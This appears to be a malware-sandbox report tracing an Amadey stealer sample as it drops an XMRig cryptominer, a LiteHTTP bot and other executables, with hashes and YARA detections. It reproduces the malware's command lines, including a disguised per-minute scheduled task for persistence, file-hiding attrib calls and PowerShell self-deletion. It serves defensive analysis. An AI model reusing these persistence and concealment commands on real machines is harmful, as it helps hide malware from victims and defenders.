d0Q4qH54t5F/FQCuKWrXwhM8WrJRpz6wNcWMmf1sqk/aIY8aWSqUM1mSR+kqzxU30c9JMQNEHaNnJp+Kz4+5KhjSzs4bukHXKXfm+a849QA1WxiR8qX8lmfmL54vqxhoiAeajvk/8JLa1/Vs2nlUkPAfSeCytC2C1tbpWwpb7BnM8fpfWG5R14nH5vmvOPUANVsYkfKl/JZn5i+eKL
2024-12-17 05:04:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:02:01
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x9d0000
File size:	3'063'296 bytes
MD5 hash:	79A76F34927416F5A65BF946E45037AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2092252463.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:04
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x730000
File size:	3'063'296 bytes
MD5 hash:	79A76F34927416F5A65BF946E45037AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2123575459.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:03:00
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x730000
File size:	3'063'296 bytes
MD5 hash:	79A76F34927416F5A65BF946E45037AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2675898098.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	00:03:12
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe"
Imagebase:	0x1a0000
File size:	1'870'336 bytes
MD5 hash:	FD17D712C627B434E99749CFC82C7D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:03:25
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	00:03:28
Start date:	17/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff731200000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:03:28
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	00:03:28
Start date:	17/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff6d78f0000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:03:28
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:03:29
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:03:29
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:03:29
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:03:29
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:03:29
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x1d0000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff6831e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff7e1f80000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6831e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff757150000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Imagebase:	0x7ff788dd0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.0.0.1; del in.exe
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	00:03:30
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:03:31
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff657290000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:03:32
Start date:	17/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.2990751286.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.2991389570.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.2990751286.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	00:03:31
Start date:	17/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.0.0.1
Imagebase:	0x7ff611a00000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	00:03:32
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	00:03:32
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	00:03:32
Start date:	17/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.1.10.1
Imagebase:	0x7ff611a00000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	00:03:33
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe"
Imagebase:	0x690000
File size:	1'763'328 bytes
MD5 hash:	D37DAB4C59E707F632BB0B91EAA87FF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	00:03:45
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe"
Imagebase:	0xc80000
File size:	4'424'704 bytes
MD5 hash:	119E98D812D67FAAD4C9243ECE8FFB66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	00:03:54
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe"
Imagebase:	0xf0000
File size:	1'892'864 bytes
MD5 hash:	888B13E065AFA64105EADCA248F496AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	00:04:01
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff657290000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	00:04:02
Start date:	17/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3341620499.0000000001375000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3341620499.000000000135B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3341620499.0000000001337000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3343064138.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	00:04:02
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	00:04:02
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	776
Total number of Limit Nodes:	16

Executed Functions

Function 00A0652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00A0652A,?,?,?,?,?,00A07661), ref: 00A06567

Memory Dump Source

Source File: 00000000.00000002.2134400411.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.2134329272.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400411.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134528022.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134558234.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134597591.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134848055.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134902076.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135289123.0000000000BA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135332337.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135362240.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135401861.0000000000BD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135417014.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135430195.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135448757.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135470244.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135486090.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135506327.0000000000BFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135522623.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135541573.0000000000C09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135560794.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135585226.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135599809.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135616720.0000000000C30000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135635670.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135652183.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135670142.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135693732.0000000000C4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135712095.0000000000C53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135727848.0000000000C54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135747074.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135762972.0000000000C62000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135783645.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135801726.0000000000C66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135820697.0000000000C6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135841530.0000000000C82000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000C86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135860280.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135907379.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135923334.0000000000CC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135940057.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135959601.0000000000CDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135978689.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135998729.0000000000CE4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136016901.0000000000CE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136035302.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2136053057.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4a596319e0cb57c2fd77dbaa87a831cb39ae4378e936584f576572fa260301f6
Instruction ID: d98f50158bb35db69c1183d5e8966d3a0a3f73aa135463f62a65cd46fb7166fc
Opcode Fuzzy Hash: 4a596319e0cb57c2fd77dbaa87a831cb39ae4378e936584f576572fa260301f6
Instruction Fuzzy Hash: A7E08C3050124CAFCE257B18ED29E993B29EF2174DF041800F9084A266CB26FD92CA81

Function 04F10DAB Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2137543945.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23ef85948051b970e9128d043ed2a67efca373f2ea9b7fd5cb78c615619ca729
Instruction ID: a579654856c129b3f0d07ad44757a8304d6dcfa8469744621c084d959eb4258e
Opcode Fuzzy Hash: 23ef85948051b970e9128d043ed2a67efca373f2ea9b7fd5cb78c615619ca729
